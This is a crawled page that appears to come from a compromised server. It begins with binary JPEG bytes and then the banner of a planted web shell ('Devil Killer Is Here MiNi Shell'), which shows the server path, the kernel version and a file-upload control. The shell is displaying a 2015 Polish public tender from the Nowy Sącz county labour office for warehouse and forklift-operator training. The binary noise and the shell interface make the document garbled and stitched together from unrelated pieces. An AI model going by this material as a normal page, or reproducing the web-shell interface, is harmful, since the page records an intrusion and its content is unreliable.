JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150430/61747-N-2015.html

<p class="kh_header"><b>Nowy Sącz: MAGAZYNIER Z UPRAWNIENIAMI KIEROWCY WÓZKÓW JEZDNIOWYCH Z NAPĘDEM SILNIKOWYM. Nr postępowania: DOR.2710.9.2015</b><br>
<b>Numer ogłoszenia: 61747 - 2015; data zamieszczenia: 30.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy dla Powiatu Nowosądeckiego , ul. Nawojowska 118, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4400808, faks 018 4400808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.powiat-ns.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MAGAZYNIER Z UPRAWNIENIAMI KIEROWCY WÓZKÓW JEZDNIOWYCH Z NAPĘDEM SILNIKOWYM. Nr postępowania: DOR.2710.9.2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa zorganizowania i przeprowadzenia szkolenia pn. MAGAZYNIER Z UPRAWNIENIAMI KIEROWCY WÓZKÓW JEZDNIOWYCH Z NAPĘDEM SILNIKOWYM.

I. Cel i termin realizacji szkolenia. 

1. Zorganizowanie i przeprowadzenie szkolenia dla 20 osób, w dwóch oddzielnych grupach i terminach po 10 osób każda.
2. Celem szkolenia jest nabycie przez uczestników szkolenia wiedzy i umiejętności praktycznych niezbędnych do podjęcia pracy w zawodzie magazyniera z uprawnieniami kierowcy wózków jezdniowych z napędem silnikowym. 
3. Czas trwania każdej edycji szkolenia wynosi nie więcej niż 46 dni roboczych (w tym egzamin państwowy przed komisją Urzędu Dozoru Technicznego) licząc od daty rozpoczęcia szkolenia. Ostatni dzień szkolenia przeznaczony jest na zakończenie szkolenia. 
4.  Planowany termin rozpoczęcia szkolenia: 
4.1. Termin rozpoczęcia szkolenia I grupy - dla 10 osób: do 7 dni od podpisania umowy.
4.2. Termin rozpoczęcia szkolenia II grupy - dla 10 osób: 01.10.2015 roku.
5. Szkolenie finansowane będzie z dwóch źródeł: 
5.1. z pozaprojektowych środków (limitów) Funduszu Pracy na finansowanie programów na rzecz promocji zatrudnienia, łagodzenia skutków bezrobocia i aktywizacji zawodowej.
5.2. ze środków Funduszu Pracy na finansowanie programów na rzecz promocji zatrudnienia, łagodzenia skutków bezrobocia i aktywizacji zawodowej z przeznaczeniem na realizację projektów współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój, projekt: Aktywizacja osób młodych pozostających bez pracy w Powiecie Nowosądeckim (I).
6. Wykonawca zobowiązuje się do promowania Unii Europejskiej, Europejskiego Funduszu Społecznego oraz Programu Operacyjnego Wiedza Edukacja Rozwój poprzez umieszczenie  w miejscu realizacji szkolenia w widocznym miejscu przynajmniej jednego plakatu formatu minimum A3, a także w przypadku osób finansowanych ze środków Europejskiego Funduszu Społecznego, umieszczenie na wszystkich dokumentach i materiałach związanych z realizacją szkolenia, w szczególności na: programie szkolenia, dzienniku zajęć, harmonogramie zajęć, listach obecności, materiałach informacyjnych, materiałach szkoleniowych; wydawanych dyplomach /certyfikatach lub innych zaświadczeniach/ znaku Unii Europejskiej wraz ze słownym odniesieniem do Unii Europejskiej i do Europejskiego Funduszu Społecznego oraz znaku Fundusze Europejskie wraz z nazwą Programu Wiedza Edukacja Rozwój oraz informacji: Szkolenie realizowane jest w ramach Inicjatywy na rzecz zatrudnienia ludzi młodych. 
7. Ze względu na brak obowiązujących wytycznych w zakresie zasad promowania i informowania o projektach współfinansowanych ze środków Unii Europejskiej w okresie 2014-2020, Zamawiający zastrzega sobie możliwość zamiany wymagań stawianych Wykonawcy w tym zakresie, w szczególności zasad stosowania logotypów oraz informacji o projekcie.


II. Warunki realizacji szkolenia:

A. W zakresie merytorycznym:
1. Liczba godzin szkoleniowych dla każdego uczestnika szkolenia wynosi: 280 godzin zegarowych,  w tym:
1.1. Moduł I - Zadania zawodowe magazyniera - obejmujący 33 godziny zegarowe zajęć teoretyczno-zawodowych.
1.2. Moduł II - Obsługa i kierowanie wózkami jezdniowymi - obejmujący 48 godzin zegarowych zajęć teoretyczno-zawodowych,  w tym 4 godziny zegarowe zajęć z zakresu bezpiecznej wymiany butli. 
1.3. Moduł III - Praktyczna nauka jazdy - obejmujący 19 godzin zegarowych zajęć dla każdego uczestnika szkolenia z zakresu praktycznej nauki jazdy - manewrowanie wózkami jezdniowymi, w tym 4 godziny zegarowe dotyczące bezpiecznej wymiany butli gazowej.
1.4. Moduł IV - Obsługa kasy fiskalnej - obejmujący  10 godzin zegarowych warsztatowych z zakresu obsługi kasy fiskalnej.
1.5. Moduł V - Warsztaty komputerowe - obejmujący 30 godzin zegarowych z zakresu obsługi licencjonowanego programu fakturowo-magazynowego.
1.6. Moduł VI - Praktyka zawodowa - obejmujący  140 godzin zegarowych zajęć praktycznych  w placówkach handlowo-magazynowych, które potencjalnie mogą zatrudnić absolwentów szkolenia.
2. Wykonawca zobowiązany jest dostarczyć do Powiatowego Urzędu Pracy dla Powiatu Nowosądeckiego na trzy dni robocze przed podpisaniem umowy, następujące dokumenty  i oświadczenia:
2.1. Program zajęć szkoleniowych, zawierający co najmniej następujące zagadnienia:
2.1.1. nazwę szkolenia,
2.1.2. czas trwania i sposób organizacji szkolenia,
2.1.3. wymagania wstępne dla uczestników szkolenia,
2.1.4. cele  szkolenia ujęte w kategoriach efektów uczenia się z uwzględnieniem wiedzy, umiejętności i kompetencji społecznych,
2.1.5. plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej,
2.1.6. opis treści - kluczowe punkty szkolenia w zakresie poszczególnych zajęć edukacyjnych,
2.1.7. wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
2.1.8. przewidziane sprawdziany i egzaminy.
2.2. Harmonogram  zajęć teoretyczno - zawodowych (obejmujący Moduły I, II, III, IV, V) który powinien zawierać: 
2.2.1. datę (poszczególne dni szkolenia),
2.2.2. godzinę rozpoczęcia oraz zakończenia zajęć w każdym dniu szkolenia,
2.2.3. liczbę godzin  zegarowych w każdym dniu szkolenia,
2.2.4. tematykę zajęć,
2.2.5. miejsce realizacji szkolenia (dokładny adres),
2.2.6. imię i nazwisko osoby prowadzącej zajęcia w każdym dniu szkolenia,
2.3. Kserokopię Akredytacji Kuratorium Oświaty zgodnej z przedmiotem zamówienia w przypadku posiadania stosownego dokumentu.
2.4. Kserokopię Certyfikatu Jakości Usług ISO w przypadku posiadania stosownego dokumentu.
2.5. Kserokopię dokumentów potwierdzających kwalifikacje kadry dydaktycznej (świadectwa/ dyplomy ukończenia szkoły), która będzie uczestniczyć w prowadzeniu zajęć szkoleniowych w poszczególnych modułach, potwierdzone za zgodność  z oryginałem.
2.6. Oświadczenie Wykonawcy o posiadaniu przez osoby wskazane do realizacji szkolenia doświadczenia zawodowego w pracy związanej z tematyką szkolenia oraz doświadczenia w realizacji określonej liczby szkoleń  zgodnie  z wymogami Specyfikacji Istotnych Warunków Zamówienia.
2.7. Wykaz osób/osoby odpowiedzialnych/odpowiedzialnej za nadzór wewnętrzny nad szkoleniem.
Osoba/osoby ta/te będzie/będą odpowiedzialne za opiekę i kontakt z uczestnikami szkolenia oraz za prawidłową realizację zawartej umowy i bezpośredni kontakt z Zamawiającym.
3. Wykonawca przedstawi Zamawiającemu do zatwierdzenia harmonogram zajęć przewidzianych w Module VI Praktyka zawodowa najpóźniej na pięć dni roboczych przed rozpoczęciem zajęć.
Harmonogram zajęć praktycznych powinien zawierać: 
3.1. wykaz osób odbywających praktykę w danym miejscu,
3.2. tematykę zajęć, 
3.3. liczbę godzin zegarowych w każdym dniu szkolenia, 
3.4. godzinę rozpoczęcia oraz zakończenia zajęć w każdym dniu szkolenia,
3.5. miejsce realizacji zajęć praktycznych (dokładny adres),
3.6. imiona i nazwiska opiekunów stanowiskowych w poszczególnych miejscach praktyk oraz numery telefonów do opiekunów stanowiskowych.
4. Program szkolenia powinien:
4.1. gwarantować uczestnikom szkolenia profesjonalne przygotowanie do egzaminów i do wykonywania pracy w zawodzie magazyniera z uprawnieniami kierowcy wózków jezdniowych  z napędem silnikowym.
4.2. uwzględniać zróżnicowany poziom umiejętności i wiedzy uczestników szkolenia, 
4.3. być opracowany w oparciu o standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne na stronie internetowej www.standardyiszkolenia.praca.gov.pl  oraz zgodnie  z wymogami określonymi w rozporządzeniu MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r., poz. 622) 
5. Program szkolenia powinien obejmować nie mniej niż poniżej wymienione zagadnienia: 
5.1. Moduł I - Zadania zawodowe magazyniera - obejmujący 33 godziny zegarowe, w czasie których przewidziano co najmniej następujące zagadnienia:
5.1.1. bezpieczeństwo i higiena pracy w jednostkach handlowo-magazynowych, przy transporcie ręcznym  i mechanicznym, ochrona przeciwpożarowa, 
5.1.2. odpowiedzialność materialna pracownika magazynowego,
5.1.3. dokumentacja organizacji magazynu,
5.1.4. sposoby rozmieszczania towarów w magazynie,
5.1.5. organizacja gospodarki magazynowej,
5.1.6. zasady właściwego przechowywania towarów,
5.1.7. przyjmowanie i wydawanie towarów na podstawie dowodów rozchodowych i przychodowych, określenie zapotrzebowania na towary, sporządzanie zamówień do kontrahentów,
5.1.8. magazynowe środki transportu oraz pomocnicze urządzenia magazynowe,
5.1.9. zmiany zachodzące w przechowywanych towarach,
5.1.10. rodzaje budowli magazynowych oraz ich wyposażenie,
5.1.11. towaroznawstwo, rozmieszczanie i przechowywanie towarów w jednostkach handlowych, odbiór ilościowy i jakościowy,
5.1.12. sporządzanie dokumentów: przyjęcia magazynowe, wydania magazynowe, przesunięcia międzymagazynowe,
5.1.13. sporządzanie dokumentów zakupu, zamówień do dostawcy i rozliczanie zobowiązań finansowych,
5.1.14. przeprowadzanie inwentaryzacji,
5.1.15. realizacja płatności gotówkowych i bezgotówkowych oraz reklamacje,
5.1.16. kultura zawodu pracownika magazynowego, m.in. zarządzanie pierwszym kontaktem, znaczenie mowy ciała podczas sprzedaży, savoir-vivre, elementy autoprezentacji w kontakcie z klientem, etyka zawodowa na stanowisku pracownika magazynowego,
5.1.17. praktyczne zastosowanie  urządzeń wspomagających system sprzedaży oraz pracę magazynu.

Zamawiający wymaga, aby osoba/osoby prowadząca/prowadzące Moduł I spełniała/spełniały następujące warunki: 
posiadała/posiadały wykształcenie ekonomiczne: co najmniej wyższe zawodowe lub magisterskie lub podyplomowe,
prowadziła/prowadziły co najmniej 5 szkoleń  o tożsamej tematyce zawartej w module.

5.2. Moduł II - Obsługa i kierowanie wózkami jezdniowymi - 48 godzin zegarowych zajęć teoretyczno-zawodowych /w tym 4 godziny zegarowe z zakresu bezpiecznej wymiany butli gazowych w wózkach wyposażonych  w te urządzenia/ obejmujących: 
5.2.1. budowa i typy stosowanych wózków jezdniowych z napędem silnikowym,
5.2.2. czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy z wózkami,
5.2.3. czynności operatora w czasie pracy  wózkiem jezdniowym z napędem silnikowym, 
5.2.4. wiadomości  z zakresu ładunkoznawstwa,
5.2.5. organizacja stanowiska i miejsca  pracy  zgodnie z zasadami BHP, 
5.2.6. wiadomości o dozorze  technicznym,
5.2.7. przygotowanie kursantów do wykonywania czynności związanych z wymianą butli.

Zamawiający wymaga, aby osoba/osoby prowadząca/prowadzące Moduł II spełniała/spełniały następujące warunki:
posiadała/posiadały wykształcenie co najmniej średnie zawodowe oraz kwalifikacje do prowadzenia szkoleń z zakresu tematyki Modułu II
prowadziła/prowadziły co najmniej 5 szkoleń  o tożsamej tematyce zawartej  w module.

5.3. Moduł III - Praktyczna nauka jazdy - 19 godzin zegarowych zajęć praktycznej jazdy wózkiem /w tym 4 godziny zajęć praktycznych z wymiany butli gazowej/. 
Zajęcia praktyczne w ramach tego modułu powinny obejmować praktyczną naukę jazdy wózkami jezdniowymi podnośnikowymi z mechanicznym napędem podnoszenia oraz samodzielną wymianę butli gazowej pod nadzorem instruktora w wózkach jezdniowych podnośnikowych z napędem gazowym 

Zamawiający wymaga, aby osoby (co najmniej 2 instruktorów) prowadzące Moduł III spełniały następujące warunki: 
- posiadały wykształcenie co najmniej średnie zawodowe oraz stosowne kwalifikacje do obsługi urządzeń technicznych objętych tematyką prowadzonego szkolenia 
- prowadziły   co najmniej 5 szkoleń  o tożsamej tematyce zawartej  w module.

Zamawiający wymaga aby zajęcia z Modułu II i III były realizowane zgodnie z:
1) programem szkolenia opracowanym i zatwierdzonym przez jednostkę organizacyjną wyznaczoną przez ministra właściwego do spraw gospodarki oraz z Rozporządzeniem Ministra Gospodarki z dnia 10.05.2002 roku w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. z 2002 r., Nr 70, poz. 650 z późn. zm.);
2) Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 04.04.2003 roku zmieniającym Rozporządzenie w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. 65 poz. 603);
3) Rozporządzeniem Ministra Gospodarki z dnia 18 lipca 2001 roku w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych (Dz. U. z 2001 r. nr 79, poz. 849), zmienione rozporządzeniem z dnia 20 lutego 2003 r. (Dz. U. z 2003 r. Nr 50, poz. 426)
4) Rozporządzeniem Rady Ministrów z dnia 7 grudnia 2012 r. w sprawie rodzajów urządzeń technicznych podlegających dozorowi technicznemu (Dz. U. z 2012 roku, poz. 1468)
Zamawiający wymaga, aby bezpośrednio po zajęciach z Modułu II i III został przeprowadzony egzamin przed komisją Urzędu Dozoru Technicznego oraz zostały wydane dla kursantów Zaświadczenia kwalifikacyjne do obsługi urządzeń transportu bliskiego. 
Koszt egzaminu zostanie ujęty  w koszcie szkolenia. 
Koszt ponownego egzaminu przed Urzędem Dozoru Technicznego,  w przypadku gdyby któryś z kursantów nie zdał egzaminu, ponosi Wykonawca.

5.4. Moduł IV - Obsługa kasy fiskalnej - obejmujący 10 godzin zegarowych zajęć warsztatowych z zakresu:
5.4.1. budowa oraz rodzaje stosowanych kas fiskalnych,
5.4.2. programowanie kas fiskalnych,
5.4.3. praktyczna obsługa kas fiskalnych wraz z obsługą drukarki fiskalnej (paragon, raport dobowy  i raport okresowy),
5.4.4. błędy obsługi i sposoby ich rozwiązywania,
5.4.5. wymiana rolki papieru.

Zamawiający wymaga, aby Wykonawca zapewnił podczas zajęć z obsługi kasy fiskalnej możliwość nabycia praktycznych umiejętności z obsługi kart płatniczych takich jak:
- opis rynku kart płatniczych,
- rodzaje transakcji kartami płatniczymi,
- zabezpieczenie kart i procedury weryfikacyjne,
- wykonywanie transakcji kartami płatniczymi,
- budowa terminala/PINpada.

Każdy uczestnik winien mieć zapewniony indywidualny dostęp do kasy fiskalnej na zasadzie  1 osoba - 1 stanowisko.

Zamawiający wymaga, aby osoba/osoby prowadząca/prowadzące Moduł IV spełniała/spełniały następujące warunki: 
posiadała/posiadały  wykształcenie co najmniej średnie,
ukończyła/ukończyły szkolenie z zakresu obsługi i programowania kas fiskalnych potwierdzone odpowiednim zaświadczeniem,
prowadziła/prowadziły co najmniej 5 szkoleń o tożsamej tematyce zawartej w module. 

5.5. Moduł V - Warsztaty komputerowe obejmujący 30 godzin zegarowych zajęć z obsługi licencjonowanego programu fakturowo-magazynowego.

Zamawiający wymaga, aby osoba/osoby prowadząca/prowadzące Moduł V Warsztaty komputerowe spełniała/spełniały następujące warunki:
posiadała/posiadały wykształcenie informatyczne lub ekonomiczne: co najmniej  wyższe zawodowe lub magisterskie lub podyplomowe,
prowadziła/prowadziły co najmniej 5 szkoleń o tożsamej tematyce zawartej w module. 

Każdy uczestnik winien mieć zapewniony indywidualny dostęp do komputera  z oprogramowaniem (licencjonowany program fakturowo-magazynowy) na zasadzie 1 osoba - 1 stanowisko.

5.6. Moduł VI - Praktyka zawodowa - obejmujący 140 godzin zegarowych zajęć praktycznych w placówkach handlowo-magazynowych, które potencjalnie mogą zatrudnić absolwentów szkolenia.

Zamawiający wymaga, aby opiekunowie prowadzący zajęcia praktyczne w placówkach handlowo-magazynowych posiadali wykształcenie: zasadnicze zawodowe i co najmniej 5 lat doświadczenia zawodowego związanego z tematyką szkolenia lub średnie zawodowe i 4 lata doświadczenia zawodowego związanego z tematyką szkolenia lub wyższe zawodowe, podyplomowe, magisterskie  i powyżej i 3 lata doświadczenia zawodowego związanego z tematyką szkolenia.
Zamawiający wymaga wyznaczenia opiekuna stanowiskowego w każdej placówce, w której będą odbywały się zajęcia praktyczne. 
Liczba kursantów w jednej placówce nie może być większa niż 2 osoby.

6. Wykonawca zobowiązany jest przeprowadzić:
6.1. testy sprawdzające wiedzę kursantów związaną z tematyką magazyniera, kasy fiskalnej oraz programu fakturowo-magazynowego, które mają być przeprowadzone bezpośrednio po realizacji zajęć z Modułów I, IV i V.
6.2. egzamin przed Komisją Urzędu Dozoru Technicznego bezpośrednio po Module II i III;
6.3. Zajęcia praktyczne mają zakończyć się pisemną opinią o praktykancie wystawioną przez opiekuna stanowiskowego w danej placówce handlowo - magazynowej, uwzględniającą poziom umiejętności i wiedzy z zakresu tematyki zajęć, motywację, zdyscyplinowanie i zaangażowanie.
7. Szkolenie winno zakończyć się wydaniem przez Wykonawcę:
7.1. zaświadczeń o ukończeniu kursu zgodnie z § 18 ust. 2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (tekst jednolity Dz. U. z 2014 r., poz. 622) wzór zaświadczenia zgodnie z załącznikiem nr 5 do w/w rozporządzenia;;
7.2. zaświadczeń potwierdzających ukończenie szkolenia i uzyskanie umiejętności lub kwalifikacji wydanych na podstawie § 71 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014 roku w sprawie szczegółowych warunków realizacji oraz trybu i sposobów prowadzenia usług rynku pracy (Dz. U. z 2014 r., poz. 667);
W/w zaświadczenia powinny zawierać:
1) numer z rejestru,
2) imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość,
3) nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
4) formę i nazwę szkolenia,
5) okres trwania szkolenia,
6) miejsce i datę wydania zaświadczenia,
7) tematy i wymiar godzin zajęć edukacyjnych,
8) podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
7.3. certyfikatów potwierdzających ukończenie szkolenia ze znakiem Unii Europejskiej wraz ze słownym odniesieniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz znakiem Fundusze Europejskie wraz z nazwą Programu Wiedza Edukacja Rozwój oraz z informacją: Szkolenie realizowane jest w ramach Inicjatywy na rzecz zatrudnienia ludzi młodych. 

Certyfikaty powinny zawierać informacje z pkt. 7.2. /Dotyczy osób, których szkolenie finansowane jest ze środków Europejskiego Funduszu Społecznego/.
7.4. zaświadczeń kwalifikacyjnych do obsługi urządzeń transportu bliskiego.
8. Zaświadczenia oraz certyfikaty powinny być wydane na papierze kredowym w ofertówce sztywnej otwieranej od góry i z prawej strony lub w teczce firmowej ośrodka szkoleniowego.
9. Odbiór w/w zaświadczeń musi być potwierdzony podpisem oraz datą odbioru przez każdego absolwenta szkolenia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 46.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).
Zamawiający żąda zgodnie z Art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia 
i instytucjach rynku pracy - Tekst jednolity: Dz. U. 2013 r. poz. 674 wpisu Wykonawcy do rejestru instytucji szkoleniowych. 

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu (Załącznik nr 3 do SIWZ) oraz poprzez sprawdzenie w systemie elektronicznym Syriusz www.ris.praca.gov.pl prowadzonym przez Wojewódzkie Urzędy Pracy czy Wykonawca posiada aktualny na dany rok kalendarzowy wpis do rejestru instytucji szkoleniowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).
Warunek ten zostanie spełniony jeśli Wykonawca wykaże minimum 1 szkolenie zgodne 
z przedmiotem zamówienia. 
Załączony wykaz szkoleń indywidualnych lub grupowych zgodnych z przedmiotem zamówienia powinien zawierać m.in.: nazwę szkolenia; wartość szkolenia; termin realizacji szkolenia;                   nazwę i adres zleceniodawcy. 
Do każdego z zamieszczonych w wykazie szkoleń należy dołączyć dowody (np. dokumenty) czy szkolenia zostały wykonane należycie. 

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu i dokumentach wymaganych w specyfikacji (Załącznik nr 3 i 7 do SIWZ).</p>
